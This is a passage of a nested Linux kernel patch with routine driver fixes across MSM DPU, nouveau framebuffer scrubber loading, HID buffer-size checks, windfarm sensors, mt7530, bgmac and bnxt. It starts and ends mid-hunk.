+ 		sm8250_vig_sblk_3, 12,  SSPP_TYPE_VIG, DPU_CLK_CTRL_VIG3),
+ 	SSPP_BLK("sspp_8", SSPP_DMA0, 0x24000,  DMA_SDM845_MASK,
+ 		sdm845_dma_sblk_0, 1, SSPP_TYPE_DMA, DPU_CLK_CTRL_DMA0),
+@@ -1065,7 +1065,7 @@ static const struct dpu_lm_cfg sc7280_lm[] = {
+ /* QCM2290 */
+ 
+ static const struct dpu_lm_sub_blks qcm2290_lm_sblk = {
+-	.maxwidth = DEFAULT_DPU_OUTPUT_LINE_WIDTH,
++	.maxwidth = DEFAULT_DPU_LINE_WIDTH,
+ 	.maxblendstages = 4, /* excluding base layer */
+ 	.blendstage_base = { /* offsets relative to mixer base */
+ 		0x20, 0x38, 0x50, 0x68
+@@ -1216,7 +1216,7 @@ static const struct dpu_pingpong_cfg sm8150_pp[] = {
+ };
+ 
+ static const struct dpu_pingpong_cfg sc7280_pp[] = {
+-	PP_BLK("pingpong_0", PINGPONG_0, 0x59000, 0, sc7280_pp_sblk, -1, -1),
++	PP_BLK("pingpong_0", PINGPONG_0, 0x69000, 0, sc7280_pp_sblk, -1, -1),
+ 	PP_BLK("pingpong_1", PINGPONG_1, 0x6a000, 0, sc7280_pp_sblk, -1, -1),
+ 	PP_BLK("pingpong_2", PINGPONG_2, 0x6b000, 0, sc7280_pp_sblk, -1, -1),
+ 	PP_BLK("pingpong_3", PINGPONG_3, 0x6c000, 0, sc7280_pp_sblk, -1, -1),
+@@ -2007,8 +2007,6 @@ static const struct dpu_mdss_cfg qcm2290_dpu_cfg = {
+ 	.intf = qcm2290_intf,
+ 	.vbif_count = ARRAY_SIZE(sdm845_vbif),
+ 	.vbif = sdm845_vbif,
+-	.reg_dma_count = 1,
+-	.dma_cfg = &sdm845_regdma,
+ 	.perf = &qcm2290_perf_data,
+ 	.mdss_irqs = IRQ_SC7180_MASK,
+ };
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_rm.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_rm.c
+index 7ada957adbbb8..58abf5fe97e20 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_rm.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_rm.c
+@@ -572,6 +572,8 @@ void dpu_rm_release(struct dpu_global_state *global_state,
+ 		ARRAY_SIZE(global_state->ctl_to_enc_id), enc->base.id);
+ 	_dpu_rm_clear_mapping(global_state->dsc_to_enc_id,
+ 		ARRAY_SIZE(global_state->dsc_to_enc_id), enc->base.id);
++	_dpu_rm_clear_mapping(global_state->dspp_to_enc_id,
++		ARRAY_SIZE(global_state->dspp_to_enc_id), enc->base.id);
+ }
+ 
+ int dpu_rm_reserve(
+diff --git a/drivers/gpu/drm/msm/msm_gem_submit.c b/drivers/gpu/drm/msm/msm_gem_submit.c
+index 1c4be193fd23f..8ac1cd27746a0 100644
+--- a/drivers/gpu/drm/msm/msm_gem_submit.c
++++ b/drivers/gpu/drm/msm/msm_gem_submit.c
+@@ -626,8 +626,8 @@ static struct msm_submit_post_dep *msm_parse_post_deps(struct drm_device *dev,
+ 	int ret = 0;
+ 	uint32_t i, j;
+ 
+-	post_deps = kmalloc_array(nr_syncobjs, sizeof(*post_deps),
+-	                          GFP_KERNEL | __GFP_NOWARN | __GFP_NORETRY);
++	post_deps = kcalloc(nr_syncobjs, sizeof(*post_deps),
++			    GFP_KERNEL | __GFP_NOWARN | __GFP_NORETRY);
+ 	if (!post_deps)
+ 		return ERR_PTR(-ENOMEM);
+ 
+@@ -642,7 +642,6 @@ static struct msm_submit_post_dep *msm_parse_post_deps(struct drm_device *dev,
+ 		}
+ 
+ 		post_deps[i].point = syncobj_desc.point;
+-		post_deps[i].chain = NULL;
+ 
+ 		if (syncobj_desc.flags) {
+ 			ret = -EINVAL;
+diff --git a/drivers/gpu/drm/nouveau/dispnv50/wndw.h b/drivers/gpu/drm/nouveau/dispnv50/wndw.h
+index 591c852f326b9..76a6ae5d56526 100644
+--- a/drivers/gpu/drm/nouveau/dispnv50/wndw.h
++++ b/drivers/gpu/drm/nouveau/dispnv50/wndw.h
+@@ -35,8 +35,9 @@ struct nv50_wndw {
+ 
+ int nv50_wndw_new_(const struct nv50_wndw_func *, struct drm_device *,
+ 		   enum drm_plane_type, const char *name, int index,
+-		   const u32 *format, enum nv50_disp_interlock_type,
+-		   u32 interlock_data, u32 heads, struct nv50_wndw **);
++		   const u32 *format, u32 heads,
++		   enum nv50_disp_interlock_type, u32 interlock_data,
++		   struct nv50_wndw **);
+ void nv50_wndw_flush_set(struct nv50_wndw *, u32 *interlock,
+ 			 struct nv50_wndw_atom *);
+ void nv50_wndw_flush_clr(struct nv50_wndw *, u32 *interlock, bool flush,
+diff --git a/drivers/gpu/drm/nouveau/include/nvkm/subdev/fb.h b/drivers/gpu/drm/nouveau/include/nvkm/subdev/fb.h
+index c5a4f49ee2065..01a22a13b4520 100644
+--- a/drivers/gpu/drm/nouveau/include/nvkm/subdev/fb.h
++++ b/drivers/gpu/drm/nouveau/include/nvkm/subdev/fb.h
+@@ -2,6 +2,7 @@
+ #ifndef __NVKM_FB_H__
+ #define __NVKM_FB_H__
+ #include <core/subdev.h>
++#include <core/falcon.h>
+ #include <core/mm.h>
+ 
+ /* memory type/access flags, do not match hardware values */
+@@ -33,7 +34,7 @@ struct nvkm_fb {
+ 	const struct nvkm_fb_func *func;
+ 	struct nvkm_subdev subdev;
+ 
+-	struct nvkm_blob vpr_scrubber;
++	struct nvkm_falcon_fw vpr_scrubber;
+ 
+ 	struct {
+ 		struct page *flush_page;
+diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/base.c b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/base.c
+index bac7dcc4c2c13..0955340cc4218 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/base.c
++++ b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/base.c
+@@ -143,6 +143,10 @@ nvkm_fb_mem_unlock(struct nvkm_fb *fb)
+ 	if (!fb->func->vpr.scrub_required)
+ 		return 0;
+ 
++	ret = nvkm_subdev_oneinit(subdev);
++	if (ret)
++		return ret;
++
+ 	if (!fb->func->vpr.scrub_required(fb)) {
+ 		nvkm_debug(subdev, "VPR not locked\n");
+ 		return 0;
+@@ -150,7 +154,7 @@ nvkm_fb_mem_unlock(struct nvkm_fb *fb)
+ 
+ 	nvkm_debug(subdev, "VPR locked, running scrubber binary\n");
+ 
+-	if (!fb->vpr_scrubber.size) {
++	if (!fb->vpr_scrubber.fw.img) {
+ 		nvkm_warn(subdev, "VPR locked, but no scrubber binary!\n");
+ 		return 0;
+ 	}
+@@ -229,7 +233,7 @@ nvkm_fb_dtor(struct nvkm_subdev *subdev)
+ 
+ 	nvkm_ram_del(&fb->ram);
+ 
+-	nvkm_blob_dtor(&fb->vpr_scrubber);
++	nvkm_falcon_fw_dtor(&fb->vpr_scrubber);
+ 
+ 	if (fb->sysmem.flush_page) {
+ 		dma_unmap_page(subdev->device->dev, fb->sysmem.flush_page_addr,
+diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/ga100.c b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/ga100.c
+index 5098f219e3e6f..a7456e7864636 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/ga100.c
++++ b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/ga100.c
+@@ -37,5 +37,5 @@ ga100_fb = {
+ int
+ ga100_fb_new(struct nvkm_device *device, enum nvkm_subdev_type type, int inst, struct nvkm_fb **pfb)
+ {
+-	return gp102_fb_new_(&ga100_fb, device, type, inst, pfb);
++	return gf100_fb_new_(&ga100_fb, device, type, inst, pfb);
+ }
+diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/ga102.c b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/ga102.c
+index 5a21b0ae45958..dd476e079fe1c 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/ga102.c
++++ b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/ga102.c
+@@ -25,25 +25,20 @@
+ #include <engine/nvdec.h>
+ 
+ static int
+-ga102_fb_vpr_scrub(struct nvkm_fb *fb)
++ga102_fb_oneinit(struct nvkm_fb *fb)
+ {
+-	struct nvkm_falcon_fw fw = {};
+-	int ret;
++	struct nvkm_subdev *subdev = &fb->subdev;
+ 
+-	ret = nvkm_falcon_fw_ctor_hs_v2(&ga102_flcn_fw, "mem-unlock", &fb->subdev, "nvdec/scrubber",
+-					0, &fb->subdev.device->nvdec[0]->falcon, &fw);
+-	if (ret)
+-		return ret;
++	nvkm_falcon_fw_ctor_hs_v2(&ga102_flcn_fw, "mem-unlock", subdev, "nvdec/scrubber",
++				  0, &subdev->device->nvdec[0]->falcon, &fb->vpr_scrubber);
+ 
+-	ret = nvkm_falcon_fw_boot(&fw, &fb->subdev, true, NULL, NULL, 0, 0);
+-	nvkm_falcon_fw_dtor(&fw);
+-	return ret;
++	return gf100_fb_oneinit(fb);
+ }
+ 
+ static const struct nvkm_fb_func
+ ga102_fb = {
+ 	.dtor = gf100_fb_dtor,
+-	.oneinit = gf100_fb_oneinit,
++	.oneinit = ga102_fb_oneinit,
+ 	.init = gm200_fb_init,
+ 	.init_page = gv100_fb_init_page,
+ 	.init_unkn = gp100_fb_init_unkn,
+@@ -51,13 +46,13 @@ ga102_fb = {
+ 	.ram_new = ga102_ram_new,
+ 	.default_bigpage = 16,
+ 	.vpr.scrub_required = tu102_fb_vpr_scrub_required,
+-	.vpr.scrub = ga102_fb_vpr_scrub,
++	.vpr.scrub = gp102_fb_vpr_scrub,
+ };
+ 
+ int
+ ga102_fb_new(struct nvkm_device *device, enum nvkm_subdev_type type, int inst, struct nvkm_fb **pfb)
+ {
+-	return gp102_fb_new_(&ga102_fb, device, type, inst, pfb);
++	return gf100_fb_new_(&ga102_fb, device, type, inst, pfb);
+ }
+ 
+ MODULE_FIRMWARE("nvidia/ga102/nvdec/scrubber.bin");
+diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gp102.c b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gp102.c
+index 2658481d575b6..14d942e8b857f 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gp102.c
++++ b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gp102.c
+@@ -29,18 +29,7 @@
+ int
+ gp102_fb_vpr_scrub(struct nvkm_fb *fb)
+ {
+-	struct nvkm_subdev *subdev = &fb->subdev;
+-	struct nvkm_falcon_fw fw = {};
+-	int ret;
+-
+-	ret = nvkm_falcon_fw_ctor_hs(&gm200_flcn_fw, "mem-unlock", subdev, NULL,
+-				     "nvdec/scrubber", 0, &subdev->device->nvdec[0]->falcon, &fw);
+-	if (ret)
+-		return ret;
+-
+-	ret = nvkm_falcon_fw_boot(&fw, subdev, true, NULL, NULL, 0, 0x00000000);
+-	nvkm_falcon_fw_dtor(&fw);
+-	return ret;
++	return nvkm_falcon_fw_boot(&fb->vpr_scrubber, &fb->subdev, true, NULL, NULL, 0, 0x00000000);
+ }
+ 
+ bool
+@@ -51,10 +40,21 @@ gp102_fb_vpr_scrub_required(struct nvkm_fb *fb)
+ 	return (nvkm_rd32(device, 0x100cd0) & 0x00000010) != 0;
+ }
+ 
++int
++gp102_fb_oneinit(struct nvkm_fb *fb)
++{
++	struct nvkm_subdev *subdev = &fb->subdev;
++
++	nvkm_falcon_fw_ctor_hs(&gm200_flcn_fw, "mem-unlock", subdev, NULL, "nvdec/scrubber",
++			       0, &subdev->device->nvdec[0]->falcon, &fb->vpr_scrubber);
++
++	return gf100_fb_oneinit(fb);
++}
++
+ static const struct nvkm_fb_func
+ gp102_fb = {
+ 	.dtor = gf100_fb_dtor,
+-	.oneinit = gf100_fb_oneinit,
++	.oneinit = gp102_fb_oneinit,
+ 	.init = gm200_fb_init,
+ 	.init_remapper = gp100_fb_init_remapper,
+ 	.init_page = gm200_fb_init_page,
+@@ -64,23 +64,10 @@ gp102_fb = {
+ 	.ram_new = gp100_ram_new,
+ };
+ 
+-int
+-gp102_fb_new_(const struct nvkm_fb_func *func, struct nvkm_device *device,
+-	      enum nvkm_subdev_type type, int inst, struct nvkm_fb **pfb)
+-{
+-	int ret = gf100_fb_new_(func, device, type, inst, pfb);
+-	if (ret)
+-		return ret;
+-
+-	nvkm_firmware_load_blob(&(*pfb)->subdev, "nvdec/scrubber", "", 0,
+-				&(*pfb)->vpr_scrubber);
+-	return 0;
+-}
+-
+ int
+ gp102_fb_new(struct nvkm_device *device, enum nvkm_subdev_type type, int inst, struct nvkm_fb **pfb)
+ {
+-	return gp102_fb_new_(&gp102_fb, device, type, inst, pfb);
++	return gf100_fb_new_(&gp102_fb, device, type, inst, pfb);
+ }
+ 
+ MODULE_FIRMWARE("nvidia/gp102/nvdec/scrubber.bin");
+diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gv100.c b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gv100.c
+index 0e3c0a8f5d716..4d8a286a7a348 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gv100.c
++++ b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gv100.c
+@@ -31,7 +31,7 @@ gv100_fb_init_page(struct nvkm_fb *fb)
+ static const struct nvkm_fb_func
+ gv100_fb = {
+ 	.dtor = gf100_fb_dtor,
+-	.oneinit = gf100_fb_oneinit,
++	.oneinit = gp102_fb_oneinit,
+ 	.init = gm200_fb_init,
+ 	.init_page = gv100_fb_init_page,
+ 	.init_unkn = gp100_fb_init_unkn,
+@@ -45,7 +45,7 @@ gv100_fb = {
+ int
+ gv100_fb_new(struct nvkm_device *device, enum nvkm_subdev_type type, int inst, struct nvkm_fb **pfb)
+ {
+-	return gp102_fb_new_(&gv100_fb, device, type, inst, pfb);
++	return gf100_fb_new_(&gv100_fb, device, type, inst, pfb);
+ }
+ 
+ MODULE_FIRMWARE("nvidia/gv100/nvdec/scrubber.bin");
+diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/priv.h b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/priv.h
+index f517751f94acd..726c30c8bf95d 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/priv.h
++++ b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/priv.h
+@@ -83,8 +83,7 @@ int gm200_fb_init_page(struct nvkm_fb *);
+ void gp100_fb_init_remapper(struct nvkm_fb *);
+ void gp100_fb_init_unkn(struct nvkm_fb *);
+ 
+-int gp102_fb_new_(const struct nvkm_fb_func *, struct nvkm_device *, enum nvkm_subdev_type, int,
+-		  struct nvkm_fb **);
++int gp102_fb_oneinit(struct nvkm_fb *);
+ bool gp102_fb_vpr_scrub_required(struct nvkm_fb *);
+ int gp102_fb_vpr_scrub(struct nvkm_fb *);
+ 
+diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/tu102.c b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/tu102.c
+index be82af0364ee4..b8803c124c3b2 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/tu102.c
++++ b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/tu102.c
+@@ -31,7 +31,7 @@ tu102_fb_vpr_scrub_required(struct nvkm_fb *fb)
+ static const struct nvkm_fb_func
+ tu102_fb = {
+ 	.dtor = gf100_fb_dtor,
+-	.oneinit = gf100_fb_oneinit,
++	.oneinit = gp102_fb_oneinit,
+ 	.init = gm200_fb_init,
+ 	.init_page = gv100_fb_init_page,
+ 	.init_unkn = gp100_fb_init_unkn,
+@@ -45,7 +45,7 @@ tu102_fb = {
+ int
+ tu102_fb_new(struct nvkm_device *device, enum nvkm_subdev_type type, int inst, struct nvkm_fb **pfb)
+ {
+-	return gp102_fb_new_(&tu102_fb, device, type, inst, pfb);
++	return gf100_fb_new_(&tu102_fb, device, type, inst, pfb);
+ }
+ 
+ MODULE_FIRMWARE("nvidia/tu102/nvdec/scrubber.bin");
+diff --git a/drivers/hid/hid-core.c b/drivers/hid/hid-core.c
+index 5c72aef3d3dd5..799a3086dbb06 100644
+--- a/drivers/hid/hid-core.c
++++ b/drivers/hid/hid-core.c
+@@ -261,6 +261,7 @@ static int hid_add_field(struct hid_parser *parser, unsigned report_type, unsign
+ {
+ 	struct hid_report *report;
+ 	struct hid_field *field;
++	unsigned int max_buffer_size = HID_MAX_BUFFER_SIZE;
+ 	unsigned int usages;
+ 	unsigned int offset;
+ 	unsigned int i;
+@@ -291,8 +292,11 @@ static int hid_add_field(struct hid_parser *parser, unsigned report_type, unsign
+ 	offset = report->size;
+ 	report->size += parser->global.report_size * parser->global.report_count;
+ 
++	if (parser->device->ll_driver->max_buffer_size)
++		max_buffer_size = parser->device->ll_driver->max_buffer_size;
++
+ 	/* Total size check: Allow for possible report index byte */
+-	if (report->size > (HID_MAX_BUFFER_SIZE - 1) << 3) {
++	if (report->size > (max_buffer_size - 1) << 3) {
+ 		hid_err(parser->device, "report is too long\n");
+ 		return -1;
+ 	}
+@@ -1966,6 +1970,7 @@ int hid_report_raw_event(struct hid_device *hid, enum hid_report_type type, u8 *
+ 	struct hid_report_enum *report_enum = hid->report_enum + type;
+ 	struct hid_report *report;
+ 	struct hid_driver *hdrv;
++	int max_buffer_size = HID_MAX_BUFFER_SIZE;
+ 	u32 rsize, csize = size;
+ 	u8 *cdata = data;
+ 	int ret = 0;
+@@ -1981,10 +1986,13 @@ int hid_report_raw_event(struct hid_device *hid, enum hid_report_type type, u8 *
+ 
+ 	rsize = hid_compute_report_size(report);
+ 
+-	if (report_enum->numbered && rsize >= HID_MAX_BUFFER_SIZE)
+-		rsize = HID_MAX_BUFFER_SIZE - 1;
+-	else if (rsize > HID_MAX_BUFFER_SIZE)
+-		rsize = HID_MAX_BUFFER_SIZE;
++	if (hid->ll_driver->max_buffer_size)
++		max_buffer_size = hid->ll_driver->max_buffer_size;
++
++	if (report_enum->numbered && rsize >= max_buffer_size)
++		rsize = max_buffer_size - 1;
++	else if (rsize > max_buffer_size)
++		rsize = max_buffer_size;
+ 
+ 	if (csize < rsize) {
+ 		dbg_hid("report %d is too short, (%d < %d)\n", report->id,
+@@ -2387,7 +2395,12 @@ int hid_hw_raw_request(struct hid_device *hdev,
+ 		       unsigned char reportnum, __u8 *buf,
+ 		       size_t len, enum hid_report_type rtype, enum hid_class_request reqtype)
+ {
+-	if (len < 1 || len > HID_MAX_BUFFER_SIZE || !buf)
++	unsigned int max_buffer_size = HID_MAX_BUFFER_SIZE;
++
++	if (hdev->ll_driver->max_buffer_size)
++		max_buffer_size = hdev->ll_driver->max_buffer_size;
++
++	if (len < 1 || len > max_buffer_size || !buf)
+ 		return -EINVAL;
+ 
+ 	return hdev->ll_driver->raw_request(hdev, reportnum, buf, len,
+@@ -2406,7 +2419,12 @@ EXPORT_SYMBOL_GPL(hid_hw_raw_request);
+  */
+ int hid_hw_output_report(struct hid_device *hdev, __u8 *buf, size_t len)
+ {
+-	if (len < 1 || len > HID_MAX_BUFFER_SIZE || !buf)
++	unsigned int max_buffer_size = HID_MAX_BUFFER_SIZE;
++
++	if (hdev->ll_driver->max_buffer_size)
++		max_buffer_size = hdev->ll_driver->max_buffer_size;
++
++	if (len < 1 || len > max_buffer_size || !buf)
+ 		return -EINVAL;
+ 
+ 	if (hdev->ll_driver->output_report)
+diff --git a/drivers/hid/uhid.c b/drivers/hid/uhid.c
+index 2a918aeb0af13..59ac757c1d471 100644
+--- a/drivers/hid/uhid.c
++++ b/drivers/hid/uhid.c
+@@ -395,6 +395,7 @@ struct hid_ll_driver uhid_hid_driver = {
+ 	.parse = uhid_hid_parse,
+ 	.raw_request = uhid_hid_raw_request,
+ 	.output_report = uhid_hid_output_report,
++	.max_buffer_size = UHID_DATA_MAX,
+ };
+ EXPORT_SYMBOL_GPL(uhid_hid_driver);
+ 
+diff --git a/drivers/macintosh/windfarm_lm75_sensor.c b/drivers/macintosh/windfarm_lm75_sensor.c
+index 24f0a444d3122..9c6febce2376b 100644
+--- a/drivers/macintosh/windfarm_lm75_sensor.c
++++ b/drivers/macintosh/windfarm_lm75_sensor.c
+@@ -33,8 +33,8 @@
+ #endif
+ 
+ struct wf_lm75_sensor {
+-	int			ds1775 : 1;
+-	int			inited : 1;
++	unsigned int		ds1775 : 1;
++	unsigned int		inited : 1;
+ 	struct i2c_client	*i2c;
+ 	struct wf_sensor	sens;
+ };
+diff --git a/drivers/macintosh/windfarm_smu_sensors.c b/drivers/macintosh/windfarm_smu_sensors.c
+index 00c6fe25fcba0..2bdb73b34d291 100644
+--- a/drivers/macintosh/windfarm_smu_sensors.c
++++ b/drivers/macintosh/windfarm_smu_sensors.c
+@@ -274,8 +274,8 @@ struct smu_cpu_power_sensor {
+ 	struct list_head	link;
+ 	struct wf_sensor	*volts;
+ 	struct wf_sensor	*amps;
+-	int			fake_volts : 1;
+-	int			quadratic : 1;
++	unsigned int		fake_volts : 1;
++	unsigned int		quadratic : 1;
+ 	struct wf_sensor	sens;
+ };
+ #define to_smu_cpu_power(c) container_of(c, struct smu_cpu_power_sensor, sens)
+diff --git a/drivers/media/i2c/ov5640.c b/drivers/media/i2c/ov5640.c
+index c159f297ab92a..16ca9dbf15442 100644
+--- a/drivers/media/i2c/ov5640.c
++++ b/drivers/media/i2c/ov5640.c
+@@ -3482,7 +3482,7 @@ static int ov5640_init_controls(struct ov5640_dev *sensor)
+ 	/* Auto/manual gain */
+ 	ctrls->auto_gain = v4l2_ctrl_new_std(hdl, ops, V4L2_CID_AUTOGAIN,
+ 					     0, 1, 1, 1);
+-	ctrls->gain = v4l2_ctrl_new_std(hdl, ops, V4L2_CID_GAIN,
++	ctrls->gain = v4l2_ctrl_new_std(hdl, ops, V4L2_CID_ANALOGUE_GAIN,
+ 					0, 1023, 1, 0);
+ 
+ 	ctrls->saturation = v4l2_ctrl_new_std(hdl, ops, V4L2_CID_SATURATION,
+diff --git a/drivers/media/rc/gpio-ir-recv.c b/drivers/media/rc/gpio-ir-recv.c
+index 8f1fff7af6c93..8dbe780dae4e7 100644
+--- a/drivers/media/rc/gpio-ir-recv.c
++++ b/drivers/media/rc/gpio-ir-recv.c
+@@ -126,6 +126,23 @@ static int gpio_ir_recv_probe(struct platform_device *pdev)
+ 				"gpio-ir-recv-irq", gpio_dev);
+ }
+ 
++static int gpio_ir_recv_remove(struct platform_device *pdev)
++{
++	struct gpio_rc_dev *gpio_dev = platform_get_drvdata(pdev);
++	struct device *pmdev = gpio_dev->pmdev;
++
++	if (pmdev) {
++		pm_runtime_get_sync(pmdev);
++		cpu_latency_qos_remove_request(&gpio_dev->qos);
++
++		pm_runtime_disable(pmdev);
++		pm_runtime_put_noidle(pmdev);
++		pm_runtime_set_suspended(pmdev);
++	}
++
++	return 0;
++}
++
+ #ifdef CONFIG_PM
+ static int gpio_ir_recv_suspend(struct device *dev)
+ {
+@@ -185,6 +202,7 @@ MODULE_DEVICE_TABLE(of, gpio_ir_recv_of_match);
+ 
+ static struct platform_driver gpio_ir_recv_driver = {
+ 	.probe  = gpio_ir_recv_probe,
++	.remove = gpio_ir_recv_remove,
+ 	.driver = {
+ 		.name   = KBUILD_MODNAME,
+ 		.of_match_table = of_match_ptr(gpio_ir_recv_of_match),
+diff --git a/drivers/net/dsa/mt7530.c b/drivers/net/dsa/mt7530.c
+index 338f238f2043c..003672d71a3bf 100644
+--- a/drivers/net/dsa/mt7530.c
++++ b/drivers/net/dsa/mt7530.c
+@@ -393,6 +393,24 @@ mt7530_fdb_write(struct mt7530_priv *priv, u16 vid,
+ 		mt7530_write(priv, MT7530_ATA1 + (i * 4), reg[i]);
+ }
+ 
++/* Set up switch core clock for MT7530 */
++static void mt7530_pll_setup(struct mt7530_priv *priv)
++{
++	/* Disable PLL */
++	core_write(priv, CORE_GSWPLL_GRP1, 0);
++
++	/* Set core clock into 500Mhz */
++	core_write(priv, CORE_GSWPLL_GRP2,
++		   RG_GSWPLL_POSDIV_500M(1) |
++		   RG_GSWPLL_FBKDIV_500M(25));
++
++	/* Enable PLL */
++	core_write(priv, CORE_GSWPLL_GRP1,
++		   RG_GSWPLL_EN_PRE |
++		   RG_GSWPLL_POSDIV_200M(2) |
++		   RG_GSWPLL_FBKDIV_200M(32));
++}
++
+ /* Setup TX circuit including relevant PAD and driving */
+ static int
+ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+@@ -453,21 +471,6 @@ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+ 	core_clear(priv, CORE_TRGMII_GSW_CLK_CG,
+ 		   REG_GSWCK_EN | REG_TRGMIICK_EN);
+ 
+-	/* Setup core clock for MT7530 */
+-	/* Disable PLL */
+-	core_write(priv, CORE_GSWPLL_GRP1, 0);
+-
+-	/* Set core clock into 500Mhz */
+-	core_write(priv, CORE_GSWPLL_GRP2,
+-		   RG_GSWPLL_POSDIV_500M(1) |
+-		   RG_GSWPLL_FBKDIV_500M(25));
+-
+-	/* Enable PLL */
+-	core_write(priv, CORE_GSWPLL_GRP1,
+-		   RG_GSWPLL_EN_PRE |
+-		   RG_GSWPLL_POSDIV_200M(2) |
+-		   RG_GSWPLL_FBKDIV_200M(32));
+-
+ 	/* Setup the MT7530 TRGMII Tx Clock */
+ 	core_write(priv, CORE_PLL_GROUP5, RG_LCDDS_PCW_NCPO1(ncpo1));
+ 	core_write(priv, CORE_PLL_GROUP6, RG_LCDDS_PCW_NCPO0(0));
+@@ -2201,6 +2204,8 @@ mt7530_setup(struct dsa_switch *ds)
+ 		     SYS_CTRL_PHY_RST | SYS_CTRL_SW_RST |
+ 		     SYS_CTRL_REG_RST);
+ 
++	mt7530_pll_setup(priv);
++
+ 	/* Enable Port 6 only; P5 as GMAC5 which currently is not supported */
+ 	val = mt7530_read(priv, MT7530_MHWTRAP);
+ 	val &= ~MHWTRAP_P6_DIS & ~MHWTRAP_PHY_ACCESS;
+diff --git a/drivers/net/ethernet/broadcom/bgmac.c b/drivers/net/ethernet/broadcom/bgmac.c
+index 3038386a5afd8..1761df8fb7f96 100644
+--- a/drivers/net/ethernet/broadcom/bgmac.c
++++ b/drivers/net/ethernet/broadcom/bgmac.c
+@@ -890,13 +890,13 @@ static void bgmac_chip_reset_idm_config(struct bgmac *bgmac)
+ 
+ 		if (iost & BGMAC_BCMA_IOST_ATTACHED) {
+ 			flags = BGMAC_BCMA_IOCTL_SW_CLKEN;
+-			if (!bgmac->has_robosw)
++			if (bgmac->in_init || !bgmac->has_robosw)
+ 				flags |= BGMAC_BCMA_IOCTL_SW_RESET;
+ 		}
+ 		bgmac_clk_enable(bgmac, flags);
+ 	}
+ 
+-	if (iost & BGMAC_BCMA_IOST_ATTACHED && !bgmac->has_robosw)
++	if (iost & BGMAC_BCMA_IOST_ATTACHED && (bgmac->in_init || !bgmac->has_robosw))
+ 		bgmac_idm_write(bgmac, BCMA_IOCTL,
+ 				bgmac_idm_read(bgmac, BCMA_IOCTL) &
+ 				~BGMAC_BCMA_IOCTL_SW_RESET);
+@@ -1490,6 +1490,8 @@ int bgmac_enet_probe(struct bgmac *bgmac)
+ 	struct net_device *net_dev = bgmac->net_dev;
+ 	int err;
+ 
++	bgmac->in_init = true;
++
+ 	bgmac_chip_intrs_off(bgmac);
+ 
+ 	net_dev->irq = bgmac->irq;
+@@ -1542,6 +1544,8 @@ int bgmac_enet_probe(struct bgmac *bgmac)
+ 	/* Omit FCS from max MTU size */
+ 	net_dev->max_mtu = BGMAC_RX_MAX_FRAME_SIZE - ETH_FCS_LEN;
+ 
++	bgmac->in_init = false;
++
+ 	err = register_netdev(bgmac->net_dev);
+ 	if (err) {
+ 		dev_err(bgmac->dev, "Cannot register net device\n");
+diff --git a/drivers/net/ethernet/broadcom/bgmac.h b/drivers/net/ethernet/broadcom/bgmac.h
+index e05ac92c06504..d73ef262991d6 100644
+--- a/drivers/net/ethernet/broadcom/bgmac.h
++++ b/drivers/net/ethernet/broadcom/bgmac.h
+@@ -472,6 +472,8 @@ struct bgmac {
+ 	int irq;
+ 	u32 int_mask;
+ 
++	bool in_init;
++
+ 	/* Current MAC state */
+ 	int mac_speed;
+ 	int mac_duplex;
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index 6c32f5c427b52..25d1642c10c3b 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -3146,7 +3146,7 @@ static int bnxt_alloc_ring(struct bnxt *bp, struct bnxt_ring_mem_info *rmem)
+ 
+ static void bnxt_free_tpa_info(struct bnxt *bp)
+ {
+-	int i;
++	int i, j;
+ 
+ 	for (i = 0; i < bp->rx_nr_rings; i++) {
+ 		struct bnxt_rx_ring_info *rxr = &bp->rx_ring[i];
+@@ -3154,8 +3154,10 @@ static void bnxt_free_tpa_info(struct bnxt *bp)
+ 		kfree(rxr->rx_tpa_idx_map);
+ 		rxr->rx_tpa_idx_map = NULL;
+ 		if (rxr->rx_tpa) {
+-			kfree(rxr->rx_tpa[0].agg_arr);
+-			rxr->rx_tpa[0].agg_arr = NULL;
++			for (j = 0; j < bp->max_tpa; j++) {
++				kfree(rxr->rx_tpa[j].agg_arr);
++				rxr->rx_tpa[j].agg_arr = NULL;
++			}
+ 		}
+ 		kfree(rxr->rx_tpa);
+ 		rxr->rx_tpa = NULL;
+@@ -3164,14 +3166,13 @@ static void bnxt_free_tpa_info(struct bnxt *bp)
+ 
+ static int bnxt_alloc_tpa_info(struct bnxt *bp)
+ {
